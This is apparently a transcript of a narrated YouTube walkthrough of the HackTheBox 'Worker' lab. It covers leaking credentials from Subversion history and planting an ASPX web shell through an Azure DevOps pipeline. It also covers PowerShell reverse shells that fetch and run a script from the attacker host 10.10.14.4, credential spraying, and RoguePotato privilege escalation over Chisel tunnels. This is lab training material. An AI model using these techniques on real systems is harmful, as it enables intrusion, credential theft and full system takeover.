What's going on YouTube? This is IPSec. I'm doing Worker from HackTheBox, which has two ports open. There's a web server that does virtual host and Apache Subversion. If you poke at the Subversion, you'll notice it's just like Git, and you can find a password in the revision history. This password gives you access to one of the websites that is the Azure Devops portal, which is just like GitHub or GitLab. And there's a pipeline that takes the master branch and copies it down to a website. So if you upload a reverse shell to the master branch, you can shell the box as the IIS user. This is server 2019, so Juicy Potato doesn't work, but you can do RoguePotato to get a shell in the box with one twist, which we'll cover at the end because that's the unintended route. The intended way is to dump all the other users' Subversion passwords, gain access to the Azure DevOps portal as the builder account, and this account can actually create pipelines, which can get you system on the box. It's different than before because now you're actually injecting code into the process that copies the master branch down to the website and not the process that just hosts the website. So with that being said, let's jump in. As always, I'm going to start with the nmap. So -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it worker, and then the IP address, which is 10.10.10.203. This can take some time to run, so I've already ran it. Looking at the ports, we have just two ports open. The very first one being HTTP on port 80, and it's telling us it's a Microsoft IIS web server. And then we also have SVN serve subversion, which is kind of like an old version of Git by Apache. It's a subversioning system on port 3690. Now, the weird thing is we see this being a Windows box, but we don't have 445 open. The other remote access port for Windows, I think it's 5985 and 5986, which is WinRM, but that's not in the top 1000 ports for nmap, so it doesn't show that by default. So I'm going to run a full port scan on this box just so we can know if WinRM is up. I know I could probably specify 5985, but I'm not 100% positive that's the port, so this will definitely get it. So I did all ports, the IP, -v is going to be showing me open ports as it finds them. OA again, output all formats. Worker -all ports. And that should be it. I don't do the script scan because script scans with all ports is going to take forever. But yeah, so while that goes, let's just go check this out. So 10.10.10.203. And we just get a blank IIS page. So from here, we could run a GoBuster, or we can just go check out the SVN repo. So I'm going to do SVN help, and this is going to give you all the commands you can do in SVN. And the important one probably is going to be ls, which maybe it's under list and it's alias. Yeah, ls and list. So we can do SVN ls, SVN : 10.10.10.203. And this is going to list the items in this. So we can do SVN log, which is like looking at the commit history. And that's going to show 5 different revisions, which are commits. So all by this Nathan user, Nathen. I think that's a different way to spell Nathan than I normally do. But SVN checkout. And we can just specify the URL. And we can download it. And right off the bat, we get a dimension.worker.htb. So I'm going to add that to my host file, so etc host. And we can do, I need to do that in sudo etc host, and 10.10.10.203, add dimension.worker.htb. I'm going to look at move.txt, and it gives us another place, devops.worker.htb. So we can add this as well. And let's try going to those pages. So I'm going to go to devops.worker.htb. And we get authentication required. It's requesting our username and password. We can try like admin guest. And we don't really get in. We can potentially run Hydra and brute force and a bunch of credentials, but I don't know the password policy on this box yet. And I always hate running credential brute forces without knowing the password policy because you may just lock random accounts out. So let's move on and do the other one, which was dimension.worker.htb. So let's copy this, go here, and yes, take me to that link. And we get a page. Going over to intro, it looks like nothing too much. Check out some of our awesome work. And we get some pages. So alpha, cartoon, lens, solid state. These are all various subdomains. So let's add them all. I'm just going to do a curl request on this. We'll do -s and -q to make it quiet. If I don't do that, it probably will like have downloading page or something. And then I'm going to grep for, let's do .star.worker.htb. And we can say -o to only grab what we grepped. And we can add, let's see, http://. And there we go. Now we have a list of the domains. I'm going to just run a quick sed to make this easier to copy and paste. So sed http:// to nothing. And let's go and create a new pane, etc host. And let's add all these domains. So we have alpha, then cartoon, lens. I should have done a different sed to like put these all on one line, but almost done now. Spectral and story. So now that we have our host file populated, we can go in Burp Suite and grab them all out. So let's just hit up twice so we get the full URLs to make it easier for us to copy this time. And go into Burp Suite, we can check each page out and determine if we want to look into it more. So looking at alpha, I see a lot of like lorem ipsum stuff. And we have a sign up thing. If I do a test email, I'm not sure it actually sent anything. If I click sign up, it goes nowhere. Learn more goes nowhere. So a bunch of blank stuff on that site. I'm going to ignore it for now, and we can go move on to the next one. And looking at this, looks like it is definitely a page. I'm clicking around to see if there were any links to this. If I saw each of these went to a different blog post, I may try like SQL injection around this place, but it looks like everything's just going to dead links. Again, nothing too interesting here, just looks like a blank page. Let's check out what lens is. So let's go over to lens. And again, nothing too special. Going over to solid state. Hit this. We have a menu here. Generic. Oh, it has a login. So let's try going over to login. And going there leads us nowhere. We can try to go to sign up. And this goes nowhere as well. So let's go over to spectral. And this is probably going to be the same thing. All these pages doesn't really have too much dynamic content. So it doesn't really warrant looking into it further. If we run into a dead end elsewhere, then we'd probably go back and revisit all these pages, maybe do dirt busting on this. Since we have a lot of random host names, it may be worth it to do a GoBuster against a host name list. So we could do GoBuster, put it in, let's see, -h. It's been a while since I did this. VHOST is what we want to brute force virtual host. And let's go to, let's see, help insecure. Let's just go opt sec list, it's probably a capital S. Then let's do discovery, DNS, subdomains, top 1,000,000, 5,000. And we can do -w and probably -u, 10.10.10.202, I think it is. And let's see, that's not it. Cat etc hosts 10.10.10.203, off by 1. So now we have this to just brute force a bunch of host names. But let's go back over to our subversion command. And I'm going to make the directory sub SVN. And we're going to do SVN checkout, SVN : / 10.10.10.203. And the reason why I'm doing this is just to try to stay a bit more organized, because SVN does create like this hidden directory, .svn. So let's do -rf. And it looks like everything that is an IP address is giving us a 400 error. Let's see. So nothing too interesting. All those were 400s. So going into our sub SVN directory, we can do the SVN and then help. We wanted to, let's see, check out something, a different revision. So we don't want to do check out, merge maker, status, probably update or up. So SVN up help, update what? I think up SVN up -r for revision. So if we did SVN log, we can do SVN up -r2. And now we have a new file. It updated, or it deleted move.txt and created deploy.ps1. If we look at deploy.ps1, we have credentials, Nathan and Wendell98. So I'm going to do vi./creds, Nathan, and then Wendell98, just so we stay organized. And I'm going to check out each one of these. So let's go to revision 3. We updated deploy.ps1. Let's see. Note, we can't have my password here. So he removed his password. Let's do version 3. We deleted deploy.ps1. Deploy.ps1. And revision 5, they added move.txt back. So we do have credentials. So let's go over to devops.worker.htb. I think that was the one that asked us for credentials. And we can say Nathan and then worker98. Nathan, it wasn't worker98, it was Wendell98. And it looks like we do get in. Let's go back to our nmap when we did all ports. And we do have 5985 open. So I'm also going to run evil WinRM -h just so I get all the flags. We want -i 10.10.10.203. -u is going to be Nathan. And -p is password. This is going to be Wendell98. And see if we can get a WinRM shell. We'll just let that one sit and go poke at this. So this is a Azure Devops. And if we go to Smart Hotel, looks like we are in some type of repository. And Azure Devops looks like it's kind of like a GitLab, GitHub, or Google Gears or something. We can look at pipelines, and this is what happens to various repositories after they get compiled. So we can see each of the host names like Spectra, Solid State, Lens, Cartoon. These all sound familiar. If we go over to the view of the pipelines, once it loads, we can see agent job 1 and deploy website. So upon the pipeline being executed, which probably happens when something gets moved into master, which is just a Git repository, it's going to deploy the website to w:/sites/ the repository name .worker.htb. Now this is interesting. It's on the drive W. So we may want to keep in mind that. And we can click around here to see if they had any like other credentials in this, but it doesn't look like it. So I'm going to go over to the repositories and we're going to try to update something. So we're in the repositories. It looks like we're in Spectral. So I'm going to clone this. So I'm going to copy this. And let's make the directory code. And then git clone, try my other clipboard. Whenever I say my other clipboard, I'd hold Control Shift and then insert. Nathan, I misspelled that. Nathan and Wendell 98 was the password. And it looks like we are downloading it. So we have to decide what type of web shell we want to try putting in here. I'm going to go with an ASPX just because it's Windows, and Windows should be able to execute that. If I saw this was running in the Apache web server or Nginx, I'd probably change it up, do like PHP or something, but since it's Windows, I'm going to go with the good old ASP. So going in my opt directory, I want to go to webshell, and this is, I believe, tennc, T-E-N-N-S-C. Let's see. Git config, tennc. So here's the URL of the Git repo I'm using. If you just go here, bunch of good web shells. So I'm going to do find --name star.aspx, and we pick one we want. Let's see, cmd.aspx. This fuzzDB web shell is the one I like using. So we can do fuzzDB, and if this doesn't work, then I do the cmd asp.aspx next. So cp this into, what is it? Home, or HTB, worker, and I'm going to go into this directory. We're also going to make the directory dub just to stay organized. Put it in here. And now let's, actually, I was imagining me executing this. We're not executing it. We want to put this in our repo, so code spectral. And now I can do a git add, and then git commit -m, and we're going to say this is definitely not a malicious request. And then we can do git push, username Nathan Wendell 98. And it is rejected. Pushes to this branch are not permitted. Okay, so let's do git branch ipsec, and we can do git checkout ipsec. So what we're doing here is just creating a new branch that is not master. So now let's git push. We have to set the upstream. So paste this, Nathan, and then Wendell 98. So now we have a new branch. If we go over to this code and click here, we do see the branch here. So let's see, I thought it would have said something up here saying to create a pull request. Oh, right here. You just updated ipsec. Do you want to create a pull request? I do. So the pull request is going to merge our repository into master. So the work items, you do need to put something. I'm just going to put one and then select the very first thing. I chose one because it's generally an ID. So you can just put any ID you want. We have two now, but create it. And the pull request should be created, and we'll see if we're on the approvers to approve the pull request. Looks like we are. So now it is approved, and now let's complete it. And this is going to push our code into master. And now that our code is into master, we can see if this pipeline goes off. And if the pipeline does trigger, then we should be able to hit our web shell. So let's go to spectral.worker.htb/cmd.aspx. Resource cannot be found. Let's see. Spectral, that is the name. So I'm going to just give it a few minutes to see if it actually goes through. I'm going to do a watch command. So that's going to run every 1 second. And I'm just looking around here to see if there's anything I can click to say execute this pipeline. And I may, if this doesn't work, may just try a different repository. If we go over to pipelines, I'm not sure what one we looked at earlier. This is looking different. We still have that not found. Let's see. Releases, builds. Oh, because we're in Smart Hotel. But we can look at view. And based upon view, we do have deploy website. And it should have deployed to this worker.htb. And we can see right here, it's removing .git. So it doesn't push that repo. But, oh, there we go. It's here, but not on my curl. What? Curl. I must have typoed something. Oh. I did not type curl. So now it's running every second. Live and learn. But now we got this web shell up. We can run net user to verify it works, and holy cow, there's a lot of users on this box. First thing I always like doing is getting a reverse shell. So I'm going to now go into, what is it? It's in my op directory, I believe. I don't see it. It's probably user share. So cd user share Nishang, that's what I want. Shells. And I want to grab invoke, PowerShell, TCP. I'm going to do oneline.ps1. And let's cat this, or v this actually, not cat, so we can edit it. And I want to take this one-liner, and I'm going to put my IP address here. So 10.10.14.4, port 9001. So now we have a PowerShell one-liner, and now we got to convert it to be a Windows base 64 format. So you do iconv-t for 2, and then UTF-16LE to convert it to UTF-16 little NDN format, and then base 64-W0. And we can copy this code. And then I'm going to run make dir log. I'm going to do script shell, or we'll do script 1, I guess. Actually, 1.log. And then rl wrap netcat lvnp 9001. That script command's just going to log everything I run. So we can do PowerShell-enc, paste this, and we get a connection. If I do ls, we have all the directories. So we can run this net user command, see all these users. We could do like net local group administrators. And we see there's one administrator user. We could probably do net local group with nothing and see all the groups. I don't know what this VSTS agent service is. There is IT, dev. I'm going to look at who's in this dev group, or net local group Nathan, or net user Nathan. We are in production, so net local group dev, and a lot of people in this dev group. So instead of poking around all this, if we go back a while, there was this W directory and the pipeline. So let's go take a look at what is in W. So if we do dir, we do have agents, Azure Devops, sites, and the Subversion repos. Now, Subversion puts all the credentials in a file, and if we're lucky, they won't be encrypted. And if they are encrypted, then we can try to decrypt them. So let's try to type the passwd. And it looks like we have just a list of a bunch of credentials. So we can copy this and see if we can log in with these accounts. So Control Z. Okay, there we go. I'm in the nmap window, so this is no longer nmap. V, I'm just going to do work. And I'm going to put this in the format I want. Actually, let's put this in creds. And then put it in the format I want, which is going to be %s space equals space, and I put a colon there. What? There we go. So now we have that. The very first one is Nathan and Wendell 98. So it looks like these could be good creds. So I'm going to save this, and I'm going to split these up into user names and passwords. So I'm going to do awk-F colon print 1, and then creds print $1, and we can put this to users, and then PW for passwords. If we cat PW, we have that. So now I can do CrackMapExec, and we're going to use the no brute force option. So WinRM 10.10.10.203-u users-p pw. I think it's no brute force. Is that how you do it? Is it going to tell me unrecognized command? It is. So maybe brute force is like that. And what this is supposed to be doing, if I'm doing the command line correctly, is it's only going to do one password per user. So if we did head -1 users and PW, it's going to use this credential set. And if we do -2, it's going to use Nishang and then this password. So it's just going to map users and passwords up 1 to 1 and try those credentials. But something is going on here. I may have to update CrackMapExec or something, because we're not even getting anything. We should get a success right away because we know the Nathan user is a valid password. Ping 10.10.10.203 looks good. Let's see. CrackMapExec. I won't spell it out. Sometimes they'll link to different versions on my box. I'm horrible with Python repos. And it's still not working. After a while, we have this nasty Python error. So one of my dependencies is screwed up. WinRM has no attribute server OS. So what I'm going to do, cd opt and CrackMapExec. We'll get pull to update it. And let's see, install CrackMapExec. And let's see, does this have guides? It does. I'm going to delete it and do this recursive because I'm not positive if I did recursive in this option. Sudo, and then we can do git clone, recursive, yep. And then the next thing we'll do is go in and run poetry install. And poetry is kind of like pip, I guess. It's just a different package manager. So poetry, let's do pip3 install poetry. Do I have it? Is this how you install poetry? It looks like it is. Using one package manager to install another package manager. I love it. With poetry installed, now we should be able to install CrackMapExec. And this may take a while. I'm not sure exactly how long it will take. So we're just going to fast forward the video and let it install. It is now done. Didn't take too long. So now we can do poetry run I think CrackMapExec. I spelled it wrong. Let's see. Let's copy this and hope it works. Poetry run. There we go. So now we can do WinRM 10.10.10.203, and then we'll do home. My name is IPsec, and then HTB worker users, and we need specify -u and -p home IPsec worker pw HTB pw or HTB worker pw. Tab autocomplete saves so many errors. No brute force, and see if this runs. Looks like I'm gonna be out of luck with running CrackMapExec. Come on. After a while, it actually started running. So I'm not sure exactly what it was doing. Maybe it's trying to do some type of reverse DNS. And that's probably what it's trying to do. Because CrackMapExec does get the host name of the box. It doesn't look like it's showing it. But it probably got the host name of the box and then tried to do a reverse lookup. So we do have credentials here. However, this taking a while is bugging me. So let's see if we can figure this out real quick. So sudo wireshark, and let's see what it does. DNS, and then we can run this. And it doesn't look like it's doing anything. If I google.com, I do see DNS request. So maybe it's not DNS. It's possible the remote end is doing something. I'm not sure why that was taking a while, but let's go with this credential set. So evil WinRM -I 10.10.10.203 -u Robisl -p wolves11. You can see it's still thinking. I'm going to try leaving that go so you can see exactly how long it takes without me pausing the video or anything. But we can do net user Robisl to see more information about me, or this user. And let's see. I am in production and remote management user, and you can see now CrackMapExec is running. Robin Islip. So don't really see anything too interesting other than being in remote management users. We could also run like whoami/all to see everything we have. We can see our privileges, and seeing this reminds me of something. Let's go back to our web shell and run whoami/all. We can see that we do have the SE impersonate privilege. If I run system info, it's going to tell me this version of Windows. We can see what hotfixes are installed, so you can look up these KBs and get an idea when this box was last patched. But the main thing I want to see is what version of Windows, and it's 2019 standard. So Juicy Potato won't work, but RoguePotato will. And we'll do that at the very end of the box because I don't think I've shown RoguePotato in its fullest yet. So that would be the unintended priv-esque we do. But going through all this, nothing really makes sense too much. The one thing we didn't do is we didn't continue on success on this. So if I look at my passwords, or let's cat users, Robbie is nowhere near the last user. There's quite a few users after him. But CrackMapExec by default is only going to stop on when the very first thing is successful. So if we do -- continue on success, it's going to take a while to run CrackMapExec, but this time it will keep running after it pwns something to see if we get another user. But while that goes, I'm going to copy this, and let's see if Robbie can see anything different in this application. And I probably would run things like WinPs and other tools but in the sake of simplicity and time, I'm not going to show every step on every video I do. But if we look at this, did I typo something? Robisl and wolves 11. So Robisl. I know Robbie can log in. Oh, Robisl. So copy Robis. Yeah, that's what I was putting. Let's try this again. Robisl, paste. I have no idea what was happening there. Hopefully, looking at the VOD can show a typo I was making every time. But instead of Hotel 360 or whatever it was, we have this parts unlimited thing. So we have something slightly different here. And if we go to this pipeline, let's see what we have. We have no pipelines found, but it is letting us build a pipeline. So let's click on build, and then it gives us a few options. I'm going to do this use classic editor to create a pipeline without YAML because it sounds simpler. So we click this build, and then let's see. This looks fine in Azure repo git. If we scroll all the way down, it lets us build with an empty pipeline. So let's just do empty. Agent pool. I'm going to click on manage to see what this is. We can try putting like one like we did before, and it's not auto-populating with us. If we look at this, we have one agent pool, which is setup. So I'm going to do setup. Looks like it configures. And then sources, agent job. And if we click the plus, it's letting us do things. So I'm going to search for PowerShell, and we can run PowerShell. So let's add that, and it needs some settings. So let's see, script path, and then arguments. So let's see, script path, test. Or we can just do C:\/ and then arguments. Let's do users public documents run me.ps1. And then we can go here, cd users document cd users public documents cd public, permission denied. Let's see, dir. I'm hoping to find like a world readable directory. Windows, let's do temp, maybe this will work. And then we can do wget 10.10.14.4, port 8000, and let's see, any other users? This is the CrackMapExec after Robbie, and we don't have anyone. So cd, HTB, and then the other thing is the box name, www, and I want to copy that reverse shell we had ran. So cp user share Nishang, invoke, or this is going to be shells, and then invoke PowerShell TCP oneline.ps1. I wonder where I had copied that to. Oh well, we can just redo it. Not a big deal. So we can now do 10.10.14.4, and then port 9001. And I'm going to name this to something more easy, so shell.ps1. And yeah, so Python 3 -m http server shell.ps1 -o shell.ps1. it has successfully downloaded it. So this is going to be c:\windows temp shell.ps1 nc lvnp 9001 error action. Let's continue on error. Save and queue. Agent pool setup. And if this runs, build 172 has been queued. We can look at the status. It's connecting. And we'll see if we get a reverse shell. So it's doing checkout. And after the checkout, we run this PowerShell script. And the reason why this Robbie user can run and the other user can't, because Robbie is an administrator of this repo. So formatted command, did it run? Looks like it did. We do who am I? We are nt authority / system. So if I go to cd / or actually c:, cd users, administrator, dir, and then desktop, and then type root.txt, we can see that is indeed the flag. So hope you guys enjoyed the video. And actually, I'm not done. I forgot, I promised I would be doing the RoguePotato, because if we do who am I /all, we can see we have this SE impersonate privilege. So yeah, to start off, we should download RoguePotato. So I'm just going to Google RoguePotato privask. Then if we go to the very first result, we can download it. If we go to releases and download roguepotato.zip, and you probably should read all of this because it is a good blog post. We won't be explaining everything, but we will do a very, very brief explanation. So if we go to www, and we can move what we downloaded, so RoguePotato, and then we can unzip it. If we look, it gave us two files, the executable and the Oxid resolver. I don't think we're going to need the Oxid resolver. We're just going to use the standalone version. So we can exit out of that. And let's go to the C drive, and go to Windows temp, and do wget 10.10.14.4 port 8000 roguepotato.exe, and we'll just call it rp.exe. So now that we have it downloaded, we can try executing it, and we can see the information. This is where it's going to differ from Juicy Potato, because it does some weird spoofing for RPC. So this explanation is probably going to be wrong, but it's kind of how I understood it. In Juicy Potato, you can make it call back to anything or any RPC port. So you run Juicy Potato, and it says, hey, connect back to me on RPC 127.0.0.1, 9999. And then the server connects, and that's where you steal the token, because you control this port. RoguePotato, what Microsoft had done that kind of fixed it, was prevented the spoofing. So when you do this, you can no longer have it go to any port. So they hard-coded this port to be 135. So what RoguePotato does is it says, instead of changing the port, go to attacker's machine on port 135, which then is going to direct you back to the target, which is 127.0.0.1, whatever host you're exploiting, 135 or 9999 to steal token. So all it did was, instead of spoofing the port, it spoofs the IP address, and then yeah, you can complete the request that way. What's listening on 9999? This is going to be the Rogue Oxid resolver. So Juicy Potato is going to start this one up for us. If we were running this from a Windows box, we may not have to direct it all the way back to itself. We can just run the Oxid resolver here. but we're going to ignore that. And the main issue we have right now is the firewall. So we can't direct it back at target 9999 because the only ports open on this box are going to be the 3 that nmap said. 80, the subversion port, and the Windows remoting port. So those are the only ports that are open. But we can use Chisel to bend the port and open up additional ports. So we're going to have to put Chisel on this box next. I'm going to clear this out just so we have a clean slate. And I'm going to see if I have Chisel. If we do locate chisel.exe, I do. I'm just going to copy Chisel. And if you don't know what Chisel is, you can search ipsec.rocks, so just do Chisel GitHub and download it. Actually, I'm going to download it because it may be different versions since 14 days ago. I don't want to run like a different version client than server or whatever. So let's download it. Chisel, let's see, AMD 64 we want. And we probably want the Windows AMD 64 as well. So I'm going to do HTB box, not boxes, just HTB worker, www, move, downloads, Chisel, we'll do the Linux one, gunzip-d, Chisel, chmod plus x. Okay, we can execute it. So now we need the executable. How did it save? Oh, come on. Open. There we go. So that should have let me save it. It's funny the Windows one is classified as a virus, but the Linux one is not. So let's do downloads, and it's going to be, did it not save? Let's see. How do I extract this? Extract. And we'll say, where's HTB? Then we want to do worker. And then www. Extract. There we go. And we have chisel.exe. Awesome. Let's stand up the web server, and we'll do wget http 10.10.14.4 port 8000 chisel exe, and I just realized we may have to get another reverse shell, which is going to be painful. It is a pretty big file, so it will take a little while to download. And now we can run a Chisel server, so cd www, and I'm going to say server mode port 8000 allow reverse. And we don't need the web server anymore because we've copied all the files to it. So we have that. Now we can run chisel.exe client 10.10.14.4 port 8000. Let's listen on quad 9 on localhost quad 9. So we have the session up and running. So on my box now, we have port 9999 listening. So parrot 9999 is mapped to worker 9999. So we have to get another shell to the box. So rlwrap nc lvnp 9001. And is our command still up? It is not. I should have. Okay, sweet. I can copy this base 64. So what we have to do is another request. So let's sign out. And then I'm going to go back here. What? Maybe a caching issue. Okay, I'm logged in as Natalie or Nathan or whatever. So that is fine. I don't know why I'm logged in, but I am. Let's go to, we can s out of that. Code, spectral, git push, Nathan, Wendell, 98. Now let's see, go to files. Oh, we have to change the repo to spectral. I'm not sure why it put me on spectral to begin with earlier in the video. Let's click pull request, item ID 1, create. Then we have to approve, complete merge. Then I want to copy this box. See if it exists yet. It does not exist. If we go again, there we go. Paste this, and now we got a shell. So cd windows temp, and we can say rp.exe, and now we should be able to get this. So we already have shell.ps1. Maybe I just can't read it. I wonder who we created shell.ps1 as. I think the Robbie user. So nc lvnp. Actually, we'll do it down here. So now we can run RoguePotato. So -r. This is going to be 10.10.14.4 -e. And we're going to say Siegel and Windows temp shell.ps1. And we'll see if this works. Oh, we didn't set the SoCAT up. So we have to set this up. And we'll do that here. And the two things we have to do, sudo to listen on 135. And then we can't hit worker 9999 directly. We have to go through a Chisel tunnel, which is 127.0.0.1. I was trying to get that on one line. So now when we run this, let's see if anything happens. So we ran RoguePotato, or RoguePotato. Ensure it is run on your local machine. What if I specify -L quad 9? Because we want this to be ran locally. There we go. I think. Kind of. Then maybe we can specify PowerShell. There we go. If we do who am I, we're NT authority system. So that let us run RoguePotato to privesc. And again, what that happened was, see if we have this workflow. So sorry for the sloppy cut. I was trying to explain this in the Vim terminal and it did not work out. So switching to MSPaint and we're going to try it. So 10.10.14.4 is this. And I'm just going to call this one parrot, and then -e was a command. This is going to be a revshell command, and -l. We put 9999. This is the oxid resolver. But since this one is the new thing, that's why we're not putting it in like variable syntax. So let's do that, and then we can say worker, and then attacker parrot. Okay, so let's create a line and kind of draw a workflow. So with Juicy Potato, we run potato, put this in a different color. Let's go dark green. Run potato, and this make system connect to 127.0.0.1.9999 steal token run command. So this is essentially Juicy Potato. And what Microsoft did was prevented us from editing this port. So it's only on 135 now. So instead of spoofing the port to 9999, it spoofs the IP address to whatever we want. So we're putting this one to parent, which is 10.10.14.4. Now, on our attacker box, we have nothing listening on port 135. That's why the instructions told us to run SoCAT. So if we do SoCAT here, let's see, can I copy my command? Yeah, that's me trying to explain it. Let's go back here and copy the SoCAT command. So what the instructions wanted us to do, I have to go back to MSPaint over here. There we go. Is we have SoCAT TCP listen, and it wanted us to do 10.10.10. We'll just say worker. Now we couldn't do this because of firewalls, because our machine on 135 cannot connect to worker on 9999. So what we did was we ran Chisel. So Chisel forward worker 9999 to localhost 9999. So now we edited this to be localhost 9999. And this works because RoguePotato, when we run it, let's delete that and get text. So execute RoguePotato, stand up Oxid on local 9999, and wait for connections and profit. Steal token to profit. So send RPC to 10.10.14.4 135. Okay. That looks good. So we send it to ourselves on this 135, and it forwards to localhost, which is chiseled back to here to this Oxid resolver. So it's a convoluted setup, and let's see, we execute RoguePotato, and it sends RPC to here, and then this one gets mapped up here. Maybe I should do this in red. So the very first request, we go there. Then this gets mapped here. And this, let's see, goes here. Which then goes here. Come on, Paint. So 1, 2, 3, and we'll put that up here, 4. And then it can do its normal path down, which will be 5. So that's the path. There is an alternative way where if we could run the Rogue Oxid Resolver executable on our box, then we wouldn't have to do this chain. So we could get rid of this step, and we could get rid of this, and this could just be wasn't I typing? Rogue oxid resolver.exe. And this then can be gone. And you could go all the way down to this way. But I didn't opt for this route because we'd have to run an executable on our Linux box. So we would have to swap over to like Commando and do all that stuff. So this was easier in my mind, even though it's a complicated network map. I mean, it's a straightforward pivot. So again, the RPC goes to our box on 135, and we have 135 bent to go to localhost 9999, which then maps back to worker. What we probably could have done would be just have Chisel map 135 to worker 9999 and get it working. But it was easier to picture this way. What I mean by that was if we change this, if we don't run SoCAT at all and got rid of SoCAT, and we say forward worker 9999 to localhost 135, then we kind of simplify this whole attack a lot. But yeah, let's try that. So let's do it live and try this. Let's see. The issue is I don't want to control C anything. So I'm going to do task kill /im chisel.exe. If I go over here, I still have Chisel running. See, task list, Chisel. I have it running, so task kill /im chisel.exe/f for force. There we go. Sweet, now I don't have to get a revshell again. So we're going to kill this SoCAT, and I'm going to run Chisel here. And we're going to run the same Chisel command, and Chisel connect here, and let's see, 135, right? I think it's 135. It's at 135 or 134. 135. So we're going to have to run this with sudo. Okay. And I had to run as sudo because we're no longer telling Chisel to eventually listen on 9999. We're mapping it to 135. So if I run this command, now we have a proxy. Localhost 135 is now listening. And if I go up here and run this, let's see what happens. So run this, and something went wrong. Because that should be connected and then forwarded back. Let's see, Chisel exe client 10.10.14.4 8000 connected. Let's see. NCZV, localhost, (135). It is connected. I wonder if this is still listening on quad 9. Let's see. Netstat an find string quad 9. It's not. Oh, I don't have this PowerShell here. There we go. I was using an old command. There we go. So that works. So again, if we go back to our beautiful paint, send RPC to that, and that is mapped to Chisel forwarded to worker 999. Yeah. Hope this all made sense. If it didn't, I guess better luck next time I do RoguePotato. Take care, guys, and I will see you all next week.